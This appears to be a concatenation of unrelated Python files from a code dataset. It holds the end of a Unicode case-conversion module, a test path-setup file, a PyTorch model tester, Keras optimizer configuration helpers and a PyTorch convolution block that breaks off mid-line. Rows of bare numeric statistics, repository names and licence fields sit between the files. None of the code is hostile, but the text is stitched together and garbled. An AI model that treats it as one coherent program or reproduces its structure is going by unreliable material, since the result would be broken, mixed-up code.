u0491\u0493\u0495\u0497\u0499\u049B\u049D\u049F\u04A1\u04A3\u04A5\u04A7\u04A9\u04AB\u04AD\u04AF\u04B1\u04B3\u04B5\u04B7\u04B9\u04BB\u04BD\u04BF\u04C2\u04C4\u04C6\u04C8\u04CA\u04CC\u04CE\u04CF\u04D1\u04D3\u04D5\u04D7\u04D9\u04DB\u04DD\u04DF\u04E1\u04E3\u04E5\u04E7\u04E9\u04EB\u04ED\u04EF\u04F1\u04F3\u04F5\u04F7\u04F9\u04FB\u04FD\u04FF\u0501\u0503\u0505\u0507\u0509\u050B\u050D\u050F\u0511\u0513\u0515\u0517\u0519\u051B\u051D\u051F\u0521\u0523\u0525\u0527\u0529\u052B\u052D\u052F\u0561-\u0587\u13F8-\u13FD\u1D00-\u1D2B\u1D6B-\u1D77\u1D79-\u1D9A\u1E01\u1E03\u1E05\u1E07\u1E09\u1E0B\u1E0D\u1E0F\u1E11\u1E13\u1E15\u1E17\u1E19\u1E1B\u1E1D\u1E1F\u1E21\u1E23\u1E25\u1E27\u1E29\u1E2B\u1E2D\u1E2F\u1E31\u1E33\u1E35\u1E37\u1E39\u1E3B\u1E3D\u1E3F\u1E41\u1E43\u1E45\u1E47\u1E49\u1E4B\u1E4D\u1E4F\u1E51\u1E53\u1E55\u1E57\u1E59\u1E5B\u1E5D\u1E5F\u1E61\u1E63\u1E65\u1E67\u1E69\u1E6B\u1E6D\u1E6F\u1E71\u1E73\u1E75\u1E77\u1E79\u1E7B\u1E7D\u1E7F\u1E81\u1E83\u1E85\u1E87\u1E89\u1E8B\u1E8D\u1E8F\u1E91\u1E93\u1E95-\u1E9D\u1E9F\u1EA1\u1EA3\u1EA5\u1EA7\u1EA9\u1EAB\u1EAD\u1EAF\u1EB1\u1EB3\u1EB5\u1EB7\u1EB9\u1EBB\u1EBD\u1EBF\u1EC1\u1EC3\u1EC5\u1EC7\u1EC9\u1ECB\u1ECD\u1ECF\u1ED1\u1ED3\u1ED5\u1ED7\u1ED9\u1EDB\u1EDD\u1EDF\u1EE1\u1EE3\u1EE5\u1EE7\u1EE9\u1EEB\u1EED\u1EEF\u1EF1\u1EF3\u1EF5\u1EF7\u1EF9\u1EFB\u1EFD\u1EFF-\u1F07\u1F10-\u1F15\u1F20-\u1F27\u1F30-\u1F37\u1F40-\u1F45\u1F50-\u1F57\u1F60-\u1F67\u1F70-\u1F7D\u1F80-\u1F87\u1F90-\u1F97\u1FA0-\u1FA7\u1FB0-\u1FB4\u1FB6\u1FB7\u1FBE\u1FC2-\u1FC4\u1FC6\u1FC7\u1FD0-\u1FD3\u1FD6\u1FD7\u1FE0-\u1FE7\u1FF2-\u1FF4\u1FF6\u1FF7\u210A\u210E\u210F\u2113\u212F\u2134\u2139\u213C\u213D\u2146-\u2149\u214E\u2184\u2C30-\u2C5E\u2C61\u2C65\u2C66\u2C68\u2C6A\u2C6C\u2C71\u2C73\u2C74\u2C76-\u2C7B\u2C81\u2C83\u2C85\u2C87\u2C89\u2C8B\u2C8D\u2C8F\u2C91\u2C93\u2C95\u2C97\u2C99\u2C9B\u2C9D\u2C9F\u2CA1\u2CA3\u2CA5\u2CA7\u2CA9\u2CAB\u2CAD\u2CAF\u2CB1\u2CB3\u2CB5\u2CB7\u2CB9\u2CBB\u2CBD\u2CBF\u2CC1\u2CC3\u2CC5\u2CC7\u2CC9\u2CCB\u2CCD\u2CCF\u2CD1\u2CD3\u2CD5\u2CD7\u2CD9\u2CDB\u2CDD\u2CDF\u2CE1\u2CE3\u2CE4\u2CEC\u2CEE\u2CF3\u2D00-\u2D25\u2D27\u2D2D\uA641\uA643\uA645\uA647\uA649\uA64B\uA64D\uA64F\uA651\uA653\uA655\uA657\uA659\uA65B\uA65D\uA65F\uA661\uA663\uA665\uA667\uA669\uA66B\uA66D\uA681\uA683\uA685\uA687\uA689\uA68B\uA68D\uA68F\uA691\uA693\uA695\uA697\uA699\uA69B\uA723\uA725\uA727\uA729\uA72B\uA72D\uA72F-\uA731\uA733\uA735\uA737\uA739\uA73B\uA73D\uA73F\uA741\uA743\uA745\uA747\uA749\uA74B\uA74D\uA74F\uA751\uA753\uA755\uA757\uA759\uA75B\uA75D\uA75F\uA761\uA763\uA765\uA767\uA769\uA76B\uA76D\uA76F\uA771-\uA778\uA77A\uA77C\uA77F\uA781\uA783\uA785\uA787\uA78C\uA78E\uA791\uA793-\uA795\uA797\uA799\uA79B\uA79D\uA79F\uA7A1\uA7A3\uA7A5\uA7A7\uA7A9\uA7B5\uA7B7\uA7FA\uAB30-\uAB5A\uAB60-\uAB65\uAB70-\uABBF\uFB00-\uFB06\uFB13-\uFB17\uFF41-\uFF5A])')
# @formatter:on
def lower_case(text, locale=None):
# type: (str, str) -> str
"""
Convert text into lower case.
Args:
text: String to convert.
locale: (Optional) Locale used to convert unicode character to lower case.
Returns:
text: Lower case text.
"""
lang = LANGUAGES.get(locale, None)
text = '' if text is None else str(text)
if lang:
text = re.sub(lang['regexp'], lambda x: lang['map'][x.group()], text)
return text.lower()
def upper_case(text, locale=None):
# type: (str, str) -> str
"""
Convert text into upper case.
Args:
text: String to convert.
locale: (Optional) Locale used to convert unicode character to upper case.
Returns:
text: Upper case text.
"""
lang = LANGUAGES.get(locale, None)
text = '' if text is None else str(text)
if lang:
text = re.sub(lang['regexp'], lambda x: lang['map'][x.group()], text)
return text.upper()
def no_case(text, locale=None, replacement=' '):
# type: (str, str, str) -> str
"""
Convert text into no case.
Args:
text: String to convert.
locale: (Optional) Locale used to convert unicode character to no case.
replacement: (Optional) Replacement string for non-word characters.
Returns:
text: Remove case from text.
"""
if text is None:
return ''
def replace(match):
_match = match.group()
index = match.start()
value = match.string
if index == 0 or index == (len(value) - len(_match)):
return ''
return replacement
text = str(text)
text = re.sub(CAMEL_CASE_REGEXP, r'\g<1> \g<2>', text)
text = re.sub(CAMEL_CASE_UPPER_REGEXP, r'\g<1> \g<2>', text)
text = re.sub(NON_WORD_REGEXP, replace, text)
return lower_case(text, locale=locale)
def snake_case(text, locale=None):
# type: (str, str) -> str
"""
Convert text into snake case.
Args:
text: String to convert.
locale: (Optional) Locale used to convert unicode character to snake case.
Returns:
text: Snake case text.
"""
return no_case(text, locale=locale, replacement='_')
def constant_case(text, locale=None):
# type: (str, str) -> str
"""
Convert text into constant case.
Args:
text: String to convert.
locale: (Optional) Locale used to convert unicode character to constant case.
Returns:
text: Constant case text.
"""
return upper_case(snake_case(text, locale=locale), locale=locale)
def kebab_case(text, locale=None):
# type: (str, str) -> str
"""
Convert text into kebab case.
Args:
text: String to convert.
locale: (Optional) Locale used to convert unicode character to kebab case.
Returns:
text: Kebab case text.
"""
return no_case(text, locale=locale, replacement='-')
def camel_case(text, locale=None, merge_numbers=False):
# type: (str, str, bool) -> str
"""
Convert text into camel case.
Args:
text: String to convert.
locale: (Optional) Locale used to convert unicode character to camel case.
merge_numbers: (Optional) Replace periods between numeric entities with an underscore.
Returns:
text: Camel case text.
"""
result = no_case(text, locale=locale)
if not merge_numbers:
result = re.sub(r' (?=\d)', '_', result)
return re.sub(r' (.)', lambda match: upper_case(match.groups()[0], locale=locale), result)
if __name__ == '__main__':
def tst_unicode_locale_replace():
unicodes = {
'tr': {
'\u0130': '\u0069',
'\u0049': '\u0131',
'\u0049\u0307': '\u0069',
},
'az': {
'\u0130': '\u0069',
'\u0049': '\u0131',
'\u0049\u0307': '\u0069',
},
'lt': {
'\u0049': '\u0069\u0307',
'\u004A': '\u006A\u0307',
'\u012E': '\u012F\u0307',
'\u00CC': '\u0069\u0307\u0300',
'\u00CD': '\u0069\u0307\u0301',
'\u0128': '\u0069\u0307\u0303',
},
}
for lang, unicode_chars in unicodes.items():
print(f'{lang}:')
for char, _ in unicode_chars.items():
str_test = f'DUMMY TEXT [{char}]'
new_str = lower_case(str_test, lang)
print(f' {str_test}')
print(f' {str_test.lower()}')
print(f' {new_str}')
print('')
tst_str = 'DUMMY 55 44 TEXT'
print(constant_case('camelCase'))
print(camel_case(tst_str))
print(kebab_case(tst_str))
| 124.715415
| 11,897
| 0.761195
| 4,878
| 31,553
| 4.908774
| 0.429479
| 0.006014
| 0.007016
| 0.005262
| 0.807684
| 0.802589
| 0.797703
| 0.797703
| 0.789601
| 0.789601
| 0
| 0.391854
| 0.059297
| 31,553
| 252
| 11,898
| 125.210317
| 0.414864
| 0.05242
| 0
| 0.356522
| 0
| 0.026087
| 0.891858
| 0.868172
| 0
| 1
| 0
| 0
| 0
| 1
| 0.078261
| false
| 0
| 0.008696
| 0
| 0.173913
| 0.069565
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
31086ed93e208b6575ce861111cb9696b9192bbc
| 508
|
py
|
Python
|
test/__init__.py
|
xynazog/amp4e_splunk_events_input
|
a5bb57cf82ca3e96fa9a444e5e5e9789eb16b70b
|
[
"BSD-2-Clause"
] | 9
|
2017-07-31T16:13:51.000Z
|
2021-01-06T15:02:36.000Z
|
test/__init__.py
|
xynazog/amp4e_splunk_events_input
|
a5bb57cf82ca3e96fa9a444e5e5e9789eb16b70b
|
[
"BSD-2-Clause"
] | 51
|
2017-10-24T17:25:44.000Z
|
2022-03-31T16:47:58.000Z
|
test/__init__.py
|
xynazog/amp4e_splunk_events_input
|
a5bb57cf82ca3e96fa9a444e5e5e9789eb16b70b
|
[
"BSD-2-Clause"
] | 12
|
2017-08-01T08:59:39.000Z
|
2021-02-24T21:10:46.000Z
|
import sys, os
from pathlib import Path
sys.path.insert(0, "/usr/lib/python3.7/site-packages")
sys.path.insert(0, "/usr/local/lib/python3.7/site-packages")
sys.path.insert(0, os.path.join(Path(__file__).parent.parent, 'bin'))
sys.path.insert(0, os.path.join(Path(__file__).parent.parent, 'bin', 'util'))
sys.path.insert(0, os.path.join(Path(__file__).parent.parent, 'bin', 'amp4e_events_input'))
sys.path.insert(0,os.path.join(Path(__file__),'/test'))
sys.path.insert(0,os.path.join(Path(__file__),'/test'))
| 50.8
| 91
| 0.732283
| 88
| 508
| 3.977273
| 0.272727
| 0.14
| 0.26
| 0.28
| 0.837143
| 0.78
| 0.78
| 0.78
| 0.78
| 0.608571
| 0
| 0.024793
| 0.047244
| 508
| 10
| 92
| 50.8
| 0.698347
| 0
| 0
| 0.222222
| 0
| 0
| 0.218075
| 0.137525
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.222222
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3132202554927f1da41a247564709282c3b1cb74
| 1,629
|
py
|
Python
|
tester.py
|
ErikRichardS/mnist-ann
|
3fb34a25ec41177d34445d2ccda6cf42b7d4175e
|
[
"MIT"
] | null | null | null |
tester.py
|
ErikRichardS/mnist-ann
|
3fb34a25ec41177d34445d2ccda6cf42b7d4175e
|
[
"MIT"
] | null | null | null |
tester.py
|
ErikRichardS/mnist-ann
|
3fb34a25ec41177d34445d2ccda6cf42b7d4175e
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn.functional as F
from time import time
import numpy as np
# Takes a model and a loader and tests the accuracy
# of the model on the dataset wrapped in the loader
def test_model(net, loader):
total = 0.0
correct = 0.0
for i, (data, labels) in enumerate(loader):
# Load data into GPU using cuda
data = data.cuda()
# Get the model's predictions
outputs = F.softmax( net(data).detach(), dim=1 )
# Find which class the model thinks is most likely
predicted = torch.argmax(
outputs,
dim=1
).cpu().float()
# Compare the model's predictions with the actual
# labels and sum up the number of correct predictions
correct += torch.sum( predicted == labels ).item()
# Update the total number of datapoints processed
total += labels.shape[0]
return correct / total
# Takes an ensemble and a loader and tests the accuracy
# of the ensemble on the dataset wrapped in the loader
def test_ensemble(ensemble, loader):
total = 0.0
correct = 0.0
for i, (data, labels) in enumerate(loader):
# Load data into GPU using cuda
data = data.cuda()
# Get the ensemble's predictions
outputs = F.softmax( ensemble.forward(data), dim=1 )
# Find which class the ensemble thinks is most likely
predicted = torch.argmax(
outputs,
dim=1
).cpu().float()
# Compare the ensemble's predictions with the actual
# labels and sum up the number of correct predictions
correct += torch.sum( predicted == labels ).item()
# Update the total number of datapoints processed
total += labels.shape[0]
return correct / total
| 21.155844
| 56
| 0.689994
| 244
| 1,629
| 4.598361
| 0.29918
| 0.028521
| 0.017825
| 0.023173
| 0.818182
| 0.770053
| 0.73262
| 0.73262
| 0.73262
| 0.606061
| 0
| 0.011111
| 0.226519
| 1,629
| 76
| 57
| 21.434211
| 0.879365
| 0.446286
| 0
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.133333
| 0
| 0.266667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
313d64468150688246dfafae0a26906dd4911c2b
| 14,334
|
py
|
Python
|
monk/tf_keras_1/optimizers/optimizers.py
|
Sanskar329/monk_v1
|
51a497a925ec1fb2c8fef1d51245ea7040a5a65a
|
[
"Apache-2.0"
] | 7
|
2020-07-26T08:37:29.000Z
|
2020-10-30T10:23:11.000Z
|
monk/tf_keras_1/optimizers/optimizers.py
|
mursalfk/monk_v1
|
62f34a52f242772186ffff7e56764e958fbcd920
|
[
"Apache-2.0"
] | null | null | null |
monk/tf_keras_1/optimizers/optimizers.py
|
mursalfk/monk_v1
|
62f34a52f242772186ffff7e56764e958fbcd920
|
[
"Apache-2.0"
] | null | null | null |
from tf_keras_1.optimizers.imports import *
from system.imports import *
@accepts(dict, [int, float], momentum=[int, float], momentum_dampening_rate=[int, float], weight_decay=[int, float],
clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def sgd(system_dict, learning_rate, momentum=0, weight_decay=0, momentum_dampening_rate=0, clipnorm=0.0, clipvalue=0.0):
'''
Select stochastic gradient descent optimizer
Args:
system_dict (dict): System dictionary storing experiment state and set variables
learning_rate (float): Initial base learning rate
momentum (float): Momentum value for driving the weights towards minima
weight_decay (float): Value for regularizing weights post every update
momentum_dampening_rate (float): Reduction rate for momentum
clipnorm (float): Gradient clipping factor
clipvalue (float): Value for clipping
Returns:
dict: updated system dict
'''
system_dict["local"]["optimizer"] = "sgd";
system_dict["hyper-parameters"]["learning_rate"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["name"] = "sgd";
system_dict["hyper-parameters"]["optimizer"]["params"]["lr"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["params"]["momentum"] = momentum;
system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"] = weight_decay;
system_dict["hyper-parameters"]["optimizer"]["params"]["momentum_dampening_rate"] = momentum_dampening_rate;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipnorm"] = clipnorm;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipvalue"] = clipvalue;
return system_dict;
@accepts(dict, [int, float], momentum=[int, float], momentum_dampening_rate=[int, float], weight_decay=[int, float],
clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def nesterov_sgd(system_dict, learning_rate, momentum=0, weight_decay=0, momentum_dampening_rate=0, clipnorm=0.0, clipvalue=0.0):
'''
Select stochastic gradient descent optimizer with nesterov acceleration
Args:
system_dict (dict): System dictionary storing experiment state and set variables
learning_rate (float): Initial base learning rate
momentum (float): Momentum value for driving the weights towards minima
weight_decay (float): Value for regularizing weights post every update
momentum_dampening_rate (float): Reduction rate for momentum
clipnorm (float): Gradient clipping factor
clipvalue (float): Value for clipping
Returns:
dict: updated system dict
'''
system_dict["local"]["optimizer"] = "nesterov_sgd";
system_dict["hyper-parameters"]["learning_rate"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["name"] = "nesterov_sgd";
system_dict["hyper-parameters"]["optimizer"]["params"]["lr"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["params"]["momentum"] = momentum;
system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"] = weight_decay;
system_dict["hyper-parameters"]["optimizer"]["params"]["momentum_dampening_rate"] = momentum_dampening_rate;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipnorm"] = clipnorm;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipvalue"] = clipvalue;
return system_dict;
@accepts(dict, [int, float], decay_rate=[int, float], epsilon=[int, float], weight_decay=[int, float],
clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def rmsprop(system_dict, learning_rate, decay_rate=0.99, epsilon=1e-08, weight_decay=0,
clipnorm=0.0, clipvalue=0.0):
'''
Select root mean score prop optimizer
Args:
system_dict (dict): System dictionary storing experiment state and set variables
learning_rate (float): Initial base learning rate
decay_rate (float): A decay factor of moving average over past squared gradient.
epsilon (float): A value to avoid division by zero
weight_decay (float): Value for regularizing weights post every update
clipnorm (float): Gradient clipping factor
clipvalue (float): Value for clipping
Returns:
dict: updated system dict
'''
system_dict["local"]["optimizer"] = "rmsprop";
system_dict["hyper-parameters"]["learning_rate"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["name"] = "rmsprop";
system_dict["hyper-parameters"]["optimizer"]["params"]["lr"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"] = epsilon;
system_dict["hyper-parameters"]["optimizer"]["params"]["decay_rate"] = decay_rate;
system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"] = weight_decay;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipnorm"] = clipnorm;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipvalue"] = clipvalue;
return system_dict;
@accepts(dict, [int, float], beta1=[int, float], beta2=[int, float], epsilon=[int, float], weight_decay=[int, float], amsgrad=bool,
clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def adam(system_dict, learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-08, weight_decay=0, amsgrad=False, clipnorm=0.0, clipvalue=0.0):
'''
Select ADAM optimizer
Args:
system_dict (dict): System dictionary storing experiment state and set variables
learning_rate (float): Initial base learning rate
beta1 (float): Exponential decay rate for first momentum estimates
beta2 (float): Exponential decay rate for first second estimates
weight_decay (float): Value for regularizing weights post every update
amsgrad (bool): If True, AMSGrad variant of this algorithm is used
epsilon (float): A value to avoid division by zero
clipnorm (float): Gradient clipping factor
clipvalue (float): Value for clipping
Returns:
dict: updated system dict
'''
system_dict["local"]["optimizer"] = "adam";
system_dict["hyper-parameters"]["learning_rate"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["name"] = "adam";
system_dict["hyper-parameters"]["optimizer"]["params"]["lr"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["params"]["beta1"] = beta1;
system_dict["hyper-parameters"]["optimizer"]["params"]["beta2"] = beta2;
system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"] = epsilon;
system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"] = weight_decay;
system_dict["hyper-parameters"]["optimizer"]["params"]["amsgrad"] = amsgrad;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipnorm"] = clipnorm;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipvalue"] = clipvalue;
return system_dict;
@accepts(dict, [int, float], beta1=[int, float], beta2=[int, float], epsilon=[int, float], weight_decay=[int, float], amsgrad=bool,
momentum_decay=[int, float], clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def nesterov_adam(system_dict, learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-08, weight_decay=0, amsgrad=False,
momentum_decay=0.004, clipnorm=0.0, clipvalue=0.0):
'''
Select ADAM optimizer with nesterov momentum acceleration
Args:
system_dict (dict): System dictionary storing experiment state and set variables
learning_rate (float): Initial base learning rate
beta1 (float): Exponential decay rate for first momentum estimates
beta2 (float): Exponential decay rate for first second estimates
weight_decay (float): Value for regularizing weights post every update
amsgrad (bool): If True, AMSGrad variant of this algorithm is used
epsilon (float): A value to avoid division by zero
clipnorm (float): Gradient clipping factor
clipvalue (float): Value for clipping
Returns:
dict: updated system dict
'''
system_dict["local"]["optimizer"] = "nadam";
system_dict["hyper-parameters"]["learning_rate"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["name"] = "nadam";
system_dict["hyper-parameters"]["optimizer"]["params"]["lr"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["params"]["beta1"] = beta1;
system_dict["hyper-parameters"]["optimizer"]["params"]["beta2"] = beta2;
system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"] = epsilon;
system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"] = weight_decay;
system_dict["hyper-parameters"]["optimizer"]["params"]["amsgrad"] = amsgrad;
system_dict["hyper-parameters"]["optimizer"]["params"]["momentum_decay"] = momentum_decay;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipnorm"] = clipnorm;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipvalue"] = clipvalue;
return system_dict;
@accepts(dict, [int, float], beta1=[int, float], beta2=[int, float], epsilon=[int, float], weight_decay=[int, float],
clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def adamax(system_dict, learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-08, weight_decay=0, clipnorm=0.0, clipvalue=0.0):
'''
Select Adamax optimizer
Args:
system_dict (dict): System dictionary storing experiment state and set variables
learning_rate (float): Initial base learning rate
beta1 (float): Exponential decay rate for first momentum estimates
beta2 (float): Exponential decay rate for first second estimates
weight_decay (float): Value for regularizing weights post every update
epsilon (float): A value to avoid division by zero
clipnorm (float): Gradient clipping factor
clipvalue (float): Value for clipping
Returns:
dict: updated system dict
'''
system_dict["local"]["optimizer"] = "adamax";
system_dict["hyper-parameters"]["learning_rate"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["name"] = "adamax";
system_dict["hyper-parameters"]["optimizer"]["params"]["lr"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["params"]["beta1"] = beta1;
system_dict["hyper-parameters"]["optimizer"]["params"]["beta2"] = beta2;
system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"] = epsilon;
system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"] = weight_decay;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipnorm"] = clipnorm;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipvalue"] = clipvalue;
return system_dict;
@accepts(dict, [int, float], rho=[int, float], epsilon=[int, float], weight_decay=[int, float],
clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def adadelta(system_dict, learning_rate, rho=0.9, epsilon=1e-06, weight_decay=0, clipnorm=0.0, clipvalue=0.0):
'''
Select Adadelta optimizer
Args:
system_dict (dict): System dictionary storing experiment state and set variables
learning_rate (float): Initial base learning rate
rho (float): Exponential decay rate for momentum estimates
weight_decay (float): Value for regularizing weights post every update
epsilon (float): A value to avoid division by zero
clipnorm (float): Gradient clipping factor
clipvalue (float): Value for clipping
Returns:
dict: updated system dict
'''
system_dict["local"]["optimizer"] = "adadelta";
system_dict["hyper-parameters"]["learning_rate"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["name"] = "adadelta";
system_dict["hyper-parameters"]["optimizer"]["params"]["lr"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["params"]["rho"] = rho;
system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"] = epsilon;
system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"] = weight_decay;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipnorm"] = clipnorm;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipvalue"] = clipvalue;
return system_dict;
@accepts(dict, [int, float], learning_rate_decay=[int, float], weight_decay=[int, float], epsilon=[int, float],
clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def adagrad(system_dict, learning_rate, learning_rate_decay=0, weight_decay=0, epsilon=0, clipnorm=0.0, clipvalue=0.0):
'''
Select Adagrad optimizer
Args:
system_dict (dict): System dictionary storing experiment state and set variables
learning_rate (float): Initial base learning rate
learning_rate_decay (float): Learning rate decay factor
weight_decay (float): Value for regularizing weights post every update
epsilon (float): A value to avoid division by zero
clipnorm (float): Gradient clipping factor
clipvalue (float): Value for clipping
Returns:
dict: updated system dict
'''
system_dict["local"]["optimizer"] = "adagrad";
system_dict["hyper-parameters"]["learning_rate"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["name"] = "adagrad";
system_dict["hyper-parameters"]["optimizer"]["params"]["lr"] = learning_rate;
system_dict["hyper-parameters"]["optimizer"]["params"]["lr_decay"] = learning_rate_decay;
system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"] = epsilon;
system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"] = weight_decay;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipnorm"] = clipnorm;
system_dict["hyper-parameters"]["optimizer"]["params"]["clipvalue"] = clipvalue;
return system_dict;
| 52.698529
| 136
| 0.699735
| 1,705
| 14,334
| 5.73607
| 0.066862
| 0.112474
| 0.107362
| 0.178937
| 0.952454
| 0.936605
| 0.932209
| 0.930266
| 0.927403
| 0.916155
| 0
| 0.009792
| 0.152156
| 14,334
| 271
| 137
| 52.892989
| 0.794948
| 0.34017
| 0
| 0.675439
| 0
| 0
| 0.310099
| 0.005122
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070175
| false
| 0
| 0.017544
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31756e419759074b9df4ad77f657fa5c3aad1e56
| 9,739
|
py
|
Python
|
modelR/layers/msr_blocks.py
|
Shank2358/LO-Det
|
869f3f537af9bc656f2bfdfa97ebb95bf70847a7
|
[
"Apache-2.0"
] | 21
|
2021-04-29T03:23:34.000Z
|
2022-03-13T23:45:39.000Z
|
modelR/layers/msr_blocks.py
|
Shank2358/LO-Det
|
869f3f537af9bc656f2bfdfa97ebb95bf70847a7
|
[
"Apache-2.0"
] | 2
|
2021-07-22T15:15:11.000Z
|
2022-02-17T08:17:05.000Z
|
modelR/layers/msr_blocks.py
|
Shank2358/LO-Det
|
869f3f537af9bc656f2bfdfa97ebb95bf70847a7
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
from dropblock import DropBlock2D, LinearScheduler
from ..layers.convolutions import *
class MSR_Convset_L(nn.Module):
def __init__(self, filters_in):
super(MSR_Convset_L, self).__init__()
self.__dw0 = Convolutional(filters_in=filters_in, filters_out=filters_in*2, kernel_size=3,
stride=1, pad=1, norm="bn", activate="leaky")
self.__pw0 = Convolutional(filters_in=filters_in*2, filters_out=filters_in, kernel_size=1,
stride=1, pad=0, norm="bn", activate="leaky")
self.__dw1 = Convolutional(filters_in=filters_in, filters_out=filters_in, kernel_size=3,
stride=1, pad=2, dila=2, norm="bn", activate="leaky")
self.__dw2 = Convolutional(filters_in=filters_in, filters_out=filters_in, kernel_size=3,
stride=1, pad=4, dila=4, norm="bn", activate="leaky")
self.__dw3 = Convolutional(filters_in=filters_in, filters_out=filters_in, kernel_size=3,
stride=1, pad=6, dila=6, norm="bn", activate="leaky")
self.__pw1 = Convolutional(filters_in=filters_in*4, filters_out=filters_in, kernel_size=1,
stride=1, pad=0, norm="bn", activate="Mish")
self.__drop = LinearScheduler(DropBlock2D(block_size=3, drop_prob=0.1), start_value=0.,
stop_value=0.1, nr_steps=5)
def forward(self, x):
dw0 = self.__dw0(x)
dw0 = self.__drop(dw0)
pw0 = self.__pw0(dw0)
dw1 = self.__dw1(pw0)
dw2 = self.__dw2(pw0)+dw1
dw3 = self.__dw3(pw0)+dw2
cat = torch.cat((pw0, dw1, dw2, dw3),1)
pw1 = self.__pw1(cat)
return pw1
class MSR_Convset_M(nn.Module):
def __init__(self, filters_in):
super(MSR_Convset_M, self).__init__()
self.__dw0 = Convolutional(filters_in=filters_in, filters_out=filters_in*2, kernel_size=3,
stride=1, pad=1, norm="bn", activate="leaky")
self.__pw0 = Convolutional(filters_in=filters_in*2, filters_out=filters_in, kernel_size=1,
stride=1, pad=0, norm="bn", activate="leaky")
self.__dw1 = Convolutional(filters_in=filters_in, filters_out=filters_in, kernel_size=3,
stride=1, pad=1, dila=1, norm="bn", activate="leaky")
self.__dw2 = Convolutional(filters_in=filters_in, filters_out=filters_in, kernel_size=3,
stride=1, pad=2, dila=2, norm="bn", activate="leaky")
self.__pw1 = Convolutional(filters_in=filters_in*2, filters_out=filters_in, kernel_size=1,
